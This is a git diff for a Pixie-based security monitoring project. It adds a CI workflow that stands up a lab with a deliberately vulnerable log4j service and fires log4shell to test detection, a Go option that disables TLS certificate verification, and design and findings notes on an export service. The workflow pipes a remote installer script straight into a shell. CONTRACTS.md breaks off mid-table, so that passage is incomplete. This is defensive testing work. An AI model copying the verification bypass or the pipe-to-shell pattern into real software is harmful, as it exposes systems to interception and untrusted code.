diff --git a/.arclint b/.arclint
index 7b87106fe80..ee012631a12 100644
--- a/.arclint
+++ b/.arclint
@@ -20,6 +20,7 @@
"(^private\/credentials\/.*\\.yaml)",
"(^src/operator/client/versioned/)",
"(^src/operator/apis/px.dev/v1alpha1/zz_generated.deepcopy.go)",
+ "(^src/e2e_test/adaptive_export_loadtest/tools/loadgen/)",
"(^src/stirling/bpf_tools/bcc_bpf/system-headers)",
"(^src/stirling/mysql/testing/.*\\.json$)",
"(^src/stirling/obj_tools/testdata/go/test_go_binary.go)",
diff --git a/.bazelignore b/.bazelignore
index d7d6c7da417..70c353d41bc 100644
--- a/.bazelignore
+++ b/.bazelignore
@@ -6,3 +6,7 @@ third_party/threadstacks
tools/chef/nodes
# To keep third party dependencies separate, privy is intentional setup as a separate bazel workspace
src/datagen/pii/privy
+
+# adaptive_export_loadtest generator is a docker-built test tool (see its README);
+# build-agent to replace with a bazel target. Until then, keep it out of gazelle.
+src/e2e_test/adaptive_export_loadtest/tools/loadgen
diff --git a/.github/workflows/e2e_log4shell_soc.yaml b/.github/workflows/e2e_log4shell_soc.yaml
new file mode 100644
index 00000000000..23982aa087f
--- /dev/null
+++ b/.github/workflows/e2e_log4shell_soc.yaml
@@ -0,0 +1,128 @@
+---
+# e2e-log4shell-soc — stand up a real SOC stack on k3s, fire log4shell end-to-end,
+# assert every canonical harness script actually runs, and profile dx in real life.
+#
+# Heavy: needs eBPF (Pixie PEM) + 16cpu/64gb → the oracle self-hosted runner, NOT
+# ubuntu-latest. Deploy mirrors the sovereignsocdemo lab recipe (k8sstormcenter/soc
+# make targets) — that kit is makefile-agent's; keep the deploy block in sync with it.
+#
+# Uses EXISTING k8sstormcenter/pixie repo secrets (no new ones): PX_DEPLOY_KEY,
+# PX_API_KEY (Pixie enroll), DX_ENTLEIN_PAT (private entlein/dx image pull),
+# CLICKHOUSE_*_PASSWORD, TAILSCALE_AUTH_KEY. Manual by default (it provisions a
+# whole cluster); flip the schedule on once it's green.
+name: e2e-log4shell-soc
+on:
+ workflow_dispatch:
+ inputs:
+ dx_image:
+ description: dx-daemon image to test (default = .image-tags pin)
+ required: false
+ default: ""
+ soc_ref:
+ description: k8sstormcenter/soc branch
+ required: false
+ default: "218-clickhouse-schema"
+permissions:
+ contents: read
+
+jobs:
+ e2e:
+ runs-on: oracle-vm-16cpu-64gb-x86-64 # eBPF + 16cpu/64gb; ubuntu-latest cannot run Pixie
+ timeout-minutes: 90
+ env:
+ KUBECONFIG: /etc/rancher/k3s/k3s.yaml
+ HARNESS: src/e2e_test/adaptive_export_loadtest/harness
+ steps:
+ - name: Checkout pixie (harness scripts)
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+
+ - name: Install k3s
+ run: |
+ curl -sfL https://get.k3s.io | sh -s - --write-kubeconfig-mode 644
+ for i in $(seq 1 60); do kubectl get nodes --no-headers 2>/dev/null | grep -q ' Ready' && break; sleep 5; done
+ kubectl get nodes
+
+ - name: Deploy the SOC stack (Pixie + kubescape + ClickHouse + AE + dx + log4j chain)
+   env:
+     PX_CLOUD_ADDR: pixie.austrianopencloudcommunity.org
+     PX_DEPLOY_KEY: ${{ secrets.PX_DEPLOY_KEY }}
+     PX_API_KEY: ${{ secrets.PX_API_KEY }}
+     TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }}
+     DX_ENTLEIN_PAT: ${{ secrets.DX_ENTLEIN_PAT }}  # private entlein/dx image pull
+     CLICKHOUSE_ANALYST_PASSWORD: ${{ secrets.CLICKHOUSE_ANALYST_PASSWORD }}
+     CLICKHOUSE_INGEST_PASSWORD: ${{ secrets.CLICKHOUSE_INGEST_PASSWORD }}
+     CLICKHOUSE_PIXIE_PASSWORD: ${{ secrets.CLICKHOUSE_PIXIE_PASSWORD }}
+     SOC_REF: ${{ inputs.soc_ref }}  # inputs go through env, never inlined into the script (injection)
+     DX_IMAGE: ${{ inputs.dx_image }}
+   run: |
+     set -euo pipefail
+     sudo apt-get update -qq && sudo apt-get install -y python3-yaml
+     git clone --depth 1 -b "$SOC_REF" https://github.com/k8sstormcenter/soc soc
+     cd soc
+     make pixie                              # vizier + AE
+     make kubescape || true                  # node-agent (netStreaming)
+     bash tree/clickhouse-lab/install.sh     # forensic_db
+     make log4j                              # vulnerable backend + attacker + dx + SBoBs (managed-by=User)
+     if [ -n "$DX_IMAGE" ]; then kubectl -n honey set image ds/dx-daemon dx-daemon="$DX_IMAGE" || true; fi
+     # optimal config + enable pprof for the real-life profile (DX_TELEMETRY_CACHE/DX_BENCH
+     # are defaults in main, set here too in case the kit's manifest predates them)
+     kubectl -n honey set env ds/dx-daemon DX_PPROF_ADDR=0.0.0.0:6060 DX_TELEMETRY_CACHE=1 DX_BENCH=pemdirect
+     kubectl -n honey rollout status ds/dx-daemon --timeout=120s
+
+ - name: Wait for stack healthy
+ run: |
+ set -euo pipefail
+ kubectl wait --for=condition=Ready pod -l name=adaptive-export -n pl --timeout=300s
+ kubectl wait --for=condition=Ready pod -l app=dx-daemon -n honey --timeout=300s
+ kubectl -n pl get pods; kubectl -n honey get pods; kubectl -n log4j-poc get pods
+ # dx must be non-blind on pemdirect (the optimal default from #29/#33)
+ kubectl -n honey logs ds/dx-daemon | grep -E "bench=pemdirect|telemetry cache ENABLED" | head
+
+ - name: Run canonical harness scripts — assert each actually runs
+ run: |
+ set -uo pipefail
+ mkdir -p /tmp/evidence; fail=0
+ for s in log4shell_fire exp_matrix nfr exp_row_reconcile; do
+ echo "::group::$s"
+ if bash "$HARNESS/$s.sh" > "/tmp/evidence/$s.log" 2>&1; then
+ echo "PASS $s"; tail -5 "/tmp/evidence/$s.log"
+ else
+ echo "FAIL $s (exit $?)"; tail -30 "/tmp/evidence/$s.log"; fail=1
+ fi
+ echo "::endgroup::"
+ done
+ # detection gate: dx must rule in the log4shell chain (not just run the script)
+ kubectl -n honey logs ds/dx-daemon | grep -iE "RULE IN|ruled_in" | tee /tmp/evidence/dx_ruleins.txt
+ if ! grep -qiE "log4shell|control-plane-credential-abuse|RULE IN" \
+ /tmp/evidence/dx_ruleins.txt; then
+ echo "NO dx rule-in — detection failed"; fail=1
+ fi
+ exit $fail
+
+ - name: Profile dx in real life (pprof + metrics)
+ if: always()
+ run: |
+ set -uo pipefail
+ POD=$(kubectl -n honey get pod -l app=dx-daemon -o jsonpath='{.items[0].metadata.name}')
+ kubectl -n honey port-forward "$POD" 6060:6060 9095:9095 & PF=$!; sleep 5
+ # 30s CPU profile under a fresh fire + heap, served by DX_PPROF_ADDR=:6060
+ ( bash "$HARNESS/log4shell_fire.sh" >/dev/null 2>&1 || true ) &
+ curl -s --max-time 40 -o /tmp/evidence/dx_cpu.pprof \
+ "http://127.0.0.1:6060/debug/pprof/profile?seconds=30" || true
+ curl -s "http://127.0.0.1:6060/debug/pprof/heap" -o /tmp/evidence/dx_heap.pprof || true
+ curl -s "http://127.0.0.1:9095/metrics" -o /tmp/evidence/dx_metrics.txt || true
+ go tool pprof -top -nodecount=25 /tmp/evidence/dx_cpu.pprof > /tmp/evidence/dx_cpu_top.txt 2>&1 || true
+ kill $PF 2>/dev/null || true
+ echo "=== dx CPU top ==="; head -30 /tmp/evidence/dx_cpu_top.txt
+ echo "=== verdict latency ==="
+ grep -E \
+ "dx_(time_to_verdict|bench_query_duration)_seconds_(sum|count)" \
+ /tmp/evidence/dx_metrics.txt || true
+
+ - name: Upload evidence + profiles
+ if: always()
+ uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3
+ with:
+ name: e2e-log4shell-evidence
+ path: /tmp/evidence/
+ retention-days: 14
diff --git a/.github/workflows/vizier_release.yaml b/.github/workflows/vizier_release.yaml
index 1241318085f..ce4f18035e5 100644
--- a/.github/workflows/vizier_release.yaml
+++ b/.github/workflows/vizier_release.yaml
@@ -140,7 +140,7 @@ jobs:
git commit -s -m "Release Helm chart Vizier ${VERSION}"
git push origin "gh-pages"
update-gh-artifacts-manifest:
- runs-on: oracle-8cpu-32gb-x86-64
+ runs-on: oracle-vm-16cpu-64gb-x86-64
needs: [get-dev-image, create-github-release]
container:
image: ${{ needs.get-dev-image.outputs.image-with-tag }}
diff --git a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
index 5d091f2c989..19f52a640f3 100644
--- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
@@ -31,6 +31,17 @@ spec:
containers:
- name: adaptive-export
image: vizier-adaptive_export_image:latest
+ # Bounded so AE can never memory-pressure a node (measured: AE uses
+ # only ~16-38Mi steady; passthrough with the raised 1M-row cap can
+ # spike, so 1Gi caps the worst case). CPU was pinned at the old 300m
+ # limit under concurrent passthrough → raised to 1 core.
+ resources:
+ requests:
+ cpu: 200m
+ memory: 128Mi
+ limits:
+ cpu: "1"
+ memory: 1Gi
env:
- name: PL_NAMESPACE
valueFrom:
diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
index beced120f63..9250676dca4 100644
--- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
@@ -1,3 +1,10 @@
+# SEED-ONLY template — NOT in kustomization.yaml (separation of concerns).
+# Real credentials are written by `make ae-auth` (pixie-api-key from keys.env,
+# clickhouse-dsn = the fixed forensic-CH constant). Do NOT add this back to the
+# bundle: a re-apply would clobber the real pixie-api-key with the placeholder
+# (the recurring "AE unauthenticated / writes 0" bug). Apply this by hand ONLY
+# to seed a brand-new cluster so the AE pod's secretKeyRef resolves before
+# ae-auth runs.
---
apiVersion: v1
kind: Secret
diff --git a/k8s/vizier/bootstrap/kustomization.yaml b/k8s/vizier/bootstrap/kustomization.yaml
index e373c6bbfe3..e2afd14af16 100644
--- a/k8s/vizier/bootstrap/kustomization.yaml
+++ b/k8s/vizier/bootstrap/kustomization.yaml
@@ -16,5 +16,10 @@ resources:
- cert_provisioner_job.yaml
- vizier_crd_role.yaml
- adaptive_export_role.yaml
-- adaptive_export_secrets.yaml
+# adaptive_export_secrets.yaml is intentionally NOT bundled here: it is only a
+# placeholder template, while the live Secret's real credentials (pixie-api-key,
+# clickhouse-dsn) are written by `make ae-auth`. Bundling it meant every infra
+# re-apply clobbered the real key with the placeholder. Separation of concerns:
+# infra (role+deployment) is re-appliable; the secret is set ONCE by ae-auth and
+# never touched by this kustomization. Apply it by hand only to seed a fresh cluster.
- adaptive_export_deployment.yaml
diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml
index f8370a1f7e1..58b6bba70af 100644
--- a/skaffold/skaffold_vizier.yaml
+++ b/skaffold/skaffold_vizier.yaml
@@ -36,8 +36,8 @@ build:
bazel:
target: //src/vizier/services/cloud_connector:cloud_connector_server_image.tar
args:
- - --config=x86_64_sysroot
- - --compilation_mode=opt
+ - --config=x86_64_sysroot
+ - --compilation_mode=opt
- image: vizier-cert_provisioner_image
context: .
bazel:
diff --git a/src/api/go/pxapi/opts.go b/src/api/go/pxapi/opts.go
index 7de095a7f1a..0e2948f999c 100644
--- a/src/api/go/pxapi/opts.go
+++ b/src/api/go/pxapi/opts.go
@@ -82,3 +82,17 @@ func WithDirectCredsInsecure() ClientOption {
c.insecureDirect = true
}
}
+
+// WithDirectTLSSkipVerify sets disableTLSVerification for direct (standalone /
+// node-local PEM) connections: the transport is TLS-encrypted, but the server
+// cert is not chain/hostname-verified. Prefer it over WithDirectCredsInsecure when
+// the direct endpoint serves TLS with a self-signed / service cert whose SAN does
+// not match the node IP (e.g. vizier-pem's direct-query port served with
+// service-tls-certs, dialed at HOST_IP). Unlike WithDisableTLSVerification it does
+// NOT require a "cluster.local" address. Bearer creds (the minted JWT) are encrypted
+// in transit, but the peer is NOT authenticated (MITM-able): trusted networks only.
+func WithDirectTLSSkipVerify() ClientOption {
+ return func(c *Client) {
+ c.disableTLSVerification = true
+ }
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md
new file mode 100644
index 00000000000..f848d63e149
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md
@@ -0,0 +1,98 @@
+# Adaptive Export (AE) — implied contracts
+
+What AE *currently assumes but does not enforce*. Each ⚠️ is an **implied** contract
+(a silent assumption); 🔴 marks ones we've observed violated, with the fix. Grounded
+in `src/vizier/services/adaptive_export/` (trigger, controller, sink, config) + the
+`forensic_db` DDL.
+
+## End-to-end data flow + where each contract sits
+
+```mermaid
+flowchart TD
+ subgraph PROD["Producer (per node)"]
+ VEC["Vector kubescape_enrich sink<br/>(or load-test fixtures)"]
+ end
+ subgraph CH1["ClickHouse — input"]
+ KL["forensic_db.kubescape_logs<br/>MergeTree ORDER BY (event_time, hostname)<br/>TTL toDateTime(event_time)+30d"]
+ end
+ subgraph AE["adaptive_export (per node DaemonSet)"]
+ TRG["TRIGGER: poll 250ms<br/>WHERE hostname=NODE AND event_time>=watermark<br/>ORDER BY event_time LIMIT N"]
+ CTL["CONTROLLER: hash + active-set<br/>window [event_time-Before, now)"]
+ PXL["DATA-PLANE: PxL per (ns,pod)×table<br/>refresh every 30s while window open"]
+ end
+ subgraph VZ["Pixie"]
+ QB["vizier-query-broker → PEMs"]
+ end
+ subgraph CH2["ClickHouse — output (forensic_db)"]
+ ATTR["adaptive_attribution<br/>ReplacingMergeTree(t_end)<br/>ORDER BY (hostname, anomaly_hash)"]
+ WM["trigger_watermark<br/>ReplacingMergeTree(updated_at)"]
+ PROT["http/dns/pgsql/conn_stats/...<br/>plain MergeTree (NO dedup)"]
+ end
+
+ VEC -->|"C1 ⚠️ event_time UNIT = seconds<br/>C2 ⚠️ hostname = k8s node name"| KL
+ KL -->|"C3 🔴 event_time monotone ≥ watermark<br/>C4 ⚠️ boundary dedup by content fp"| TRG
+ TRG --> CTL
+ CTL -->|"C5 ⚠️ anomaly_hash = f(pid,comm,pod,ns) only"| ATTR
+ TRG -->|"C6 ⚠️ watermark persist throttled ~5s"| WM
+ CTL --> PXL
+ PXL -->|"C7 needs registered vizier"| QB
+ QB -->|"C8 🔴 plain MergeTree + 30s re-pull → dup"| PROT
+ PXL -->|"C9 ⚠️ write only if rows>0"| PROT
+ ATTR -. "C10 ⚠️ join: events.pod = ns/pod ↔ attribution.pod = bare" .- PROT
+```
+
+## Boot / dependency contract
+
+```mermaid
+flowchart LR
+ ENV["ENV (all non-empty or FATAL):<br/>PIXIE_CLUSTER_ID · CLUSTER_NAME<br/>PIXIE_API_KEY · CLICKHOUSE_DSN"] --> BOOT
+ CM["cm/pl-cloud-config<br/>PL_CLOUD_ADDR=…:443"] -->|"C11 🔴 missing :443 → crashloop"| BOOT
+ BOOT["AE boot"] --> DDL["C12 self-applies forensic_db DDL<br/>(ADAPTIVE_SKIP_APPLY=false)"]
+ BOOT --> CTRLPLANE["control plane: CH only"]
+ BOOT --> DATAPLANE["data plane: needs query-broker<br/>(C7) + ADAPTIVE_PUSH_PIXIE_ROWS"]
+```
+
+## Contract register
+
+| # | Contract (implied) | Enforced? | Status / fix |
+|---|---|---|---|
+| C1 | `kubescape_logs.event_time` is unix **seconds** (one unit end-to-end) | ❌ trigger auto-detects s/ms/ns; DDL `toDateTime()` assumes seconds | 🔴 **F8 root** — see C3; AE-2 standardize+normalize |
+| C2 | `hostname` = the k8s **node** name (AE polls `WHERE hostname=node`) | ❌ convention only | ⚠️ fixtures must use a real node, else no AE ever reads them |
+| C3 | every new anomaly's `event_time` ≥ current watermark (monotone) | ❌ strict HWM filter | 🔴 **F8** — a larger-unit / out-of-order / future row poisons the HWM → all later rows silently dropped. **Fix (PR #53):** normalize cursor to nanos (`chNormEventTimeNanos`); AE-9: ingest-order cursor / bounded-lookback+dedup + below-watermark metric |
+| C4 | rows sharing `event_time` at the boundary are deduped by content fingerprint | ✅ `seenAtBoundary` | ok |
+| C5 | `anomaly_hash = SHA256(pid,comm,pod,ns)[:16]` — identity is the **workload**, independent of event_time/RuleID | ✅ | ok (N events for one target → 1 attribution row) |
+| C6 | `trigger_watermark` persisted value tracks the live cursor | ❌ throttled ~5s | ⚠️ external readers/restart see up to 5s stale; AE-7 flush-on-shutdown |
+| C7 | data-plane requires a **registered** vizier query-broker | ❌ | ⚠️ control plane works without it; data plane silently does nothing |
+| C8 | re-pulling a window is idempotent | ❌ protocol tables plain MergeTree (no dedup) + 30s re-pull | 🔴 duplicate inflation. **Fix:** single-shot (`ADAPTIVE_PUSH_REFRESH_SEC=-1`, or `AFTER>Pixie: PxL per table for (ns,pod), slice since last_upper
+ Pixie-->>AE: rows
+ AE->>CH: write rows (write ⊇ DX read, C14)
+ end
+ DX->>AE: StartExport / StopExport / extend t_end (control surface, CONTROL_ADDR)
+ Note over AE: stop ONLY on t_end or DX stop — never silently early (C15)
+```
+
+- **DX controls:** (1) open/extend a window (each referral/anomaly extends `t_end`), (2) explicit **StopExport** via the control surface (`CONTROL_ADDR`, design rev-3 — confirm wired), (3) the active set (which pods AE over-captures).
+- **DX relies on:** C5 (stable hash identity), C14 (write ⊇ read), **C15 (no premature stop)**, C9 (0 rows only when the workload is genuinely silent), C10 (the `ns/pod` ↔ bare join). For DX to steer dependably, C3/C8/C13/C15 must move from 🔴 to ✅.
+
+## Legend
+✅ enforced in code · ⚠️ implied (assumed, not checked) · 🔴 observed violated (fix noted).
+Full repro + backlog: `FINDINGS_AND_BACKLOG.md`. The fixes for C3/C1 are on PR #53 (`ae-prod`).
diff --git a/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md
new file mode 100644
index 00000000000..c385b04a6ec
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md
@@ -0,0 +1,170 @@
+# AE load-test — reproducible findings + robustness backlog
+
+Rig `6a3066767841074cd3200495` (k3s, 2 nodes), AE `vizier-adaptive_export_image:0.14.19-aeprod-clean3`,
+control plane against ClickHouse (real kubescape NOT deployed; only `kubescape_logs` fixtures injected).
+Every finding below is REPRODUCED with the harness in `harness/`; numbers are measured, not estimated.
+
+## Headline
+
+1. **The "writes stop after initial success, data still on Pixie" bug is REPRODUCED (F8).** AE's trigger
+ gates on a strict high-water-mark of the kubescape-supplied `event_time`; **any anomaly with
+ `event_time < watermark` is silently dropped**. A single mixed-unit row (nanos/millis) poisons the
+ watermark to ~1.78e18 → every subsequent seconds-row is dropped **forever** → AE stops writing
+ although Pixie still has the data. Reproduced + recovered (reset watermark + restart) on the rig.
+2. AE's **control-plane write surface is EXACTLY reproducible** when event_times are monotonic — `71/71`
+ then `20/20` (E1, seconds-native) std=0.
+3. **F1 correction:** production (soc Vector) emits `event_time` in **seconds**, for which the DDL TTL is
+ correct. My earlier "DDL bug" report was triggered by my fixtures using **nanoseconds**; the real,
+ durable issue is that the unit is **not standardized/enforced** (trigger auto-detects s/ms/ns; DDL
+ assumes seconds) — which is also the root enabler of the F8 catastrophe.
+
+## Reproducible findings
+
+### F8 — CRITICAL (likely THE production bug): watermark high-water-mark silently drops any `event_time < watermark`
+`trigger_watermark` is a monotonic cursor on the kubescape-supplied `event_time` (the trigger SELECT does
+`WHERE event_time >= watermark`). It is **content-derived, not ingest-ordered**, so it is fragile to:
+1. **Unit heterogeneity (catastrophic):** one anomaly in nanos/millis sets `watermark ≈ 1.78e18`; every
+ later seconds-row (`~1.78e9`) is `< watermark` → dropped **forever**. The trigger explicitly supports
+ s/ms/ns, so a mixed pipeline guarantees this.
+2. **Clock skew / out-of-order alerts:** a late/earlier-stamped anomaly after a newer one → dropped.
+3. **Restart re-scan:** on reboot AE loads the persisted watermark (or re-scans to the max existing row),
+ so anomalies stamped below that max are never processed.
+Effect = "writes succeed initially, then stop, data still on Pixie" (the trigger halts; the data plane
+and Pixie are fine). **Reproduced on the rig** (E8 sustained): with the watermark poisoned at a leftover
+nanos value (`1781559619170395824`), 25/25 ticks of fresh seconds anomalies → **n_anomalies stayed 0**.
+After `ALTER TABLE trigger_watermark DELETE WHERE 1=1` + AE restart, once tick event_times rose above the
+re-scanned max, **n_anomalies grew 1→2→3→4, delta=1 per tick** (healthy steady state). Evidence:
+`e8_steady.csv` (stalled), `e8_recov.csv` (recovered + steady growth).
+
+### F1 — `kubescape_logs` TTL/PARTITION assume seconds; non-seconds producers are TTL-deleted (unit not enforced)
+**Correction to the earlier report:** production (soc Vector, `to_unix_timestamp(ts)` = VRL **seconds**;
+confirmed by the AE code comment "Vector's kubescape sink … writes unix SECONDS ~1.7e9") emits **seconds**,
+for which `toDateTime(event_time)` is CORRECT — the DDL is **not** buggy in production. The overflow I first
+saw was caused by **my fixtures using nanoseconds** (copied from the Go `integration_test`/`e2e` convention,
+which use `UnixNano`). The durable issue: the unit is **unstandardized** — the trigger auto-detects
+s/ms/ns but the DDL hardcodes seconds, so a millis/nanos producer has ALL its `kubescape_logs`
+TTL-deleted. Original (now-superseded) overflow detail follows for the record:
+`event_time` is UInt64 **nanoseconds** (all Go code + every fixture + `integration_test.go` use
+`UnixNano`). But the DDL (soc `clickhouse-lab/schema.sql` AND AE's embedded
+`internal/clickhouse/schema.sql`) does:
+```sql
+PARTITION BY toYYYYMM(toDateTime(event_time))
+TTL toDateTime(event_time) + INTERVAL 30 DAY
+```
+`toDateTime()` interprets its arg as **seconds**. Reproduced on the rig:
+```
+toDateTime(1781559074162913804) = 2106-02-07 (saturates at DateTime max)
+toDateTime(1781559074162913804)+30 DAY = 1970-01-30 (OVERFLOWS past max → wraps to 1970)
+(... ) < now() = 1 (already_expired)
+```
+→ every row is born already-expired → CH TTL-deletes `kubescape_logs` on the next merge.
+Measured: after injecting ~20 anomalies, `kubescape_logs` held **2** rows; all showed `expired=1`.
+The AE trigger (250 ms poll) races the merge: anomalies polled before deletion get an
+`adaptive_attribution` row; the rest are **lost with no error logged** (the ~10% E1 miss).
+PARTITION is also broken — every row lands in the single `2106-02` partition.
+
+**Fix validated on the rig:**
+```sql
+ALTER TABLE forensic_db.kubescape_logs
+ MODIFY TTL toDateTime(intDiv(event_time, 1000000000)) + INTERVAL 30 DAY;
+```
+→ `ttl_expiry = 2026-07-15`, `expired = 0` → **E1 re-run = 20/20 PASS, std=0** (was ~9/10).
+
+### F2 — Anomaly loss is silent + unretried
+When F1 (or any input-side pruning / transient CH write error) drops an anomaly, AE logs **nothing**
+and never retries — `adaptive_attribution` simply lacks the row. There is no `dropped_anomalies` /
+`trigger_lag` metric to detect it. Reproduced: rep 8 had 0 attribution, AE log had zero errors/warnings.
+
+### F3 — POSITIVE: control plane is EXACTLY reproducible when processed
+With F1 fixed: `uniqExact(anomaly_hash)` and `adaptive_attribution` FINAL counts are **std=0 / CV=0**
+across all reps. Dedup is deterministic (N events for one (pid,comm,pod,ns) → 1 hash → 1 row).
+Measured (TTL-fixed):
+- **E1** single anomaly = **20/20 EXACT** (uniq=1, attrib=1 every rep)
+- **E3** fan-out (8 distinct pods) = **20/20 EXACT** (uniq=8, attrib=8 every rep)
+- **E4** boundary collision (2 rows, same `event_time`, different RuleID, same target) = **20/20 EXACT**
+ (fingerprint-dedup deterministic → 1 hash, 1 row)
+- **E2** dedup/extend (10 events, 1 target → 1 row) = **10/10 EXACT** (uniq=1, attrib=1)
+- **E6** restart idempotency = **1/1 EXACT** — attribution stayed exactly 1 across an AE rollout-restart
+ (no double-count on watermark reload)
+
+**Total: 71/71 control-plane reps EXACT (std=0)** after AE-1.
+
+### F4 — AE cannot boot for ClickHouse-only / control-plane-only operation
+AE fatals at config validation without pixie cluster identity, even when only the CH trigger→attribution
+path is needed:
+```
+fatal "missing required env variable 'PIXIE_CLUSTER_ID'" then 'CLUSTER_NAME'
+```
+Worked around with a dummy `PIXIE_CLUSTER_ID` + `CLUSTER_NAME` + `ADAPTIVE_PUSH_PIXIE_ROWS=false`.
+This couples the (CH-only) control plane to a healthy vizier registration that it does not use.
+
+### F5 — `trigger_watermark` persistence is throttled (~5 s)
+The persisted cursor lags the in-memory cursor by up to `ADAPTIVE_WATERMARK_SAVE_SEC` (default 5 s).
+Reproduced: queried `watermark` lagged the just-injected `event_time` by one rep repeatedly (the
+in-memory cursor + `adaptive_attribution` were already correct). On crash, up to that interval of
+progress is lost → reprocessing (dedup-safe, but wasteful + can surprise external observers).
+
+### F6 — (provisioning / dependability) custom-version vizier never registered
+`make pixie` with `VIZIER_VERSION=…-aeprod-clean3` (extract_yaml path) left **`pl-cloud-config`** and
+**`pl-cluster-secrets`** uncreated → cert-provisioner crashloops (`pl-cloud-config not found`,
+`pl-cluster-secrets does not exist`) → NATS/PEM/query-broker never start → **no data plane**. Hand-created
+`pl-cloud-config`; `pl-cluster-secrets` requires cloud registration. This blocks the live **E5 data-plane**
+experiments (harness is ready, waiting on a healthy `vizier-query-broker`).
+
+### F7 — single-pull config confirmed
+AE boots with `window_after=5s window_before=2m0s poll_interval=250ms` — `AFTER (5s) < refresh (30s)`
+forces exactly one pull per window on the published image (so the non-deduping MergeTree protocol tables
+aren't re-inserted). The new `ADAPTIVE_PUSH_REFRESH_SEC=-1` knob (added this branch, uncommitted) is the
+explicit equivalent.
+
+## Backlog — make AE repeatable, robust, dependable
+
+| ID | Pri | Fix | Why |
+|----|-----|-----|-----|
+| **AE-9** | **P0** | **Make the trigger cursor robust** — don't gate on the content `event_time` as a strict HWM. Options: (a) cursor on **ingest order** (a monotonic insert id / `_part`+row, or an `inserted_at DEFAULT now64()` column) instead of `event_time`; (b) bounded **lookback window** (re-scan `event_time >= watermark - L`) + **content-dedup** (anomaly fingerprint) so out-of-order/skewed/below-watermark anomalies are still processed exactly once; (c) NORMALIZE `event_time` to one unit before it ever reaches the cursor. Add `dx_anomalies_below_watermark_total` + `trigger_watermark_seconds` metrics + alert. | **F8 — the production "writes stop, data on Pixie" bug.** A single mixed-unit/skewed/out-of-order row poisons the HWM → silent total halt. Highest-impact dependability fix. |
+| **AE-2** | **P0** | Standardize `event_time` to ONE documented unit + **normalize-or-reject at ingest** (Vector + AE); remove the trigger's silent s/ms/ns auto-detect (it *enables* F8 + F1). | The unit ambiguity is the root enabler of both F8 (watermark poison) and F1 (TTL delete). |
+| **AE-1** | P1 | Make the `kubescape_logs` DDL TTL **and** PARTITION unit-agnostic (e.g. normalize `event_time` in a MATERIALIZED `event_dt DateTime64(9)` used by TTL/PARTITION) so a non-seconds producer isn't silently TTL-deleted. Patch BOTH soc `clickhouse-lab/schema.sql` and AE embedded `internal/clickhouse/schema.sql`. | F1: defense-in-depth — even with AE-2, a stray non-seconds row shouldn't vanish. (Production seconds path is currently correct.) |
+| **AE-3** | P1 | Eliminate the retention-vs-trigger race: AE should own `kubescape_logs` deletion (delete only AFTER an anomaly is acked into `adaptive_attribution`), OR decouple trigger progress from row TTL. Add `dx_anomalies_dropped_total` + `trigger_lag_seconds` metrics + alert. | F1/F2: today a pruned-before-polled row is lost invisibly. Observability + ordering guarantee. |
+| **AE-4** | P1 | Make `adaptive_attribution` writes durable — retry with backoff, count failures, never silently drop. | F2: best-effort write = unaccounted loss under any CH hiccup. |
+| **AE-5** | P1 | Allow CH-only / control-plane boot: make `PIXIE_CLUSTER_ID`/`CLUSTER_NAME`/`PIXIE_API_KEY` optional when `ADAPTIVE_PUSH_PIXIE_ROWS=false` and not streaming/passthrough. | F4: enables AE testing + degraded operation without a healthy vizier. |
+| **AE-6** | P2 | Make protocol tables `ReplacingMergeTree` keyed by (hostname,event_time,upid,…) so repeated pulls are idempotent regardless of refresh; keep `ADAPTIVE_PUSH_REFRESH_SEC` (done) for explicit single-shot. | Data-plane robustness: removes the "plain MergeTree + 30s re-pull → duplicate inflation" footgun (the reason single-pull is currently required). |
+| **AE-7** | P2 | Flush `trigger_watermark` on shutdown; make the save throttle configurable. | F5: bound crash-reprocessing + give observers a fresh cursor. |
+| **AE-8** | P2 | (makefile-agent) `make pixie` for custom `VIZIER_VERSION` must create `pl-cloud-config` and complete cloud registration (`pl-cluster-secrets`). | F6: blocks data-plane e2e + any real deployment of a custom AE build. |
+
+## Fix implemented + validated (F8 / AE-2 unit-normalization)
+
+**Code (working tree, `internal/trigger/clickhouse.go`):** the trigger cursor is now **canonical
+nanoseconds**. Added `normalizeEventTimeNanos()` (s/ms/ns → ns, same thresholds as
+`controller.eventTimeToTime`) + `chNormEventTimeNanos` (the ClickHouse equivalent). The poll SELECT now
+filters + orders on `chNormEventTimeNanos >= watermark` (was raw `event_time >= watermark`);
+`maxSeen`, the in-memory watermark, the boundary-dedup compare, and the loaded/persisted watermark are all
+normalized. Net: a mixed-unit row can no longer drive the HWM past real rows. Unit test
+`clickhouse_internal_test.go` (in-package; runs on a build PG): `TestNormalizeEventTimeNanos` +
+`TestFetchSinceFiltersOnNormalizedEventTime`.
+
+**Empirically validated at the data layer on the rig (no AE rebuild needed)** — against the actual
+poisoned watermark `1781559619170395824`:
+- OLD raw filter `event_time >= wm` → **0 rows** (AE sees nothing = the bug)
+- NEW normalized filter `chNormEventTimeNanos >= wm` → **60 rows** (all recovered)
+- table held 60 cplane-01 rows the whole time — the filter was the sole cause.
+
+**Still to land:** rebuild + deploy the AE image carrying this Go change (can't `git push` per rules →
+hand to build-agent / `gh-pixie-build`), then re-run E8 to confirm no-poison live. AE-9 (out-of-order
+lookback + below-watermark metric) and AE-1 (unit-agnostic DDL TTL/PARTITION) remain.
+
+## Reproducibility status
+
+| Layer / experiment | Status |
+|---|---|
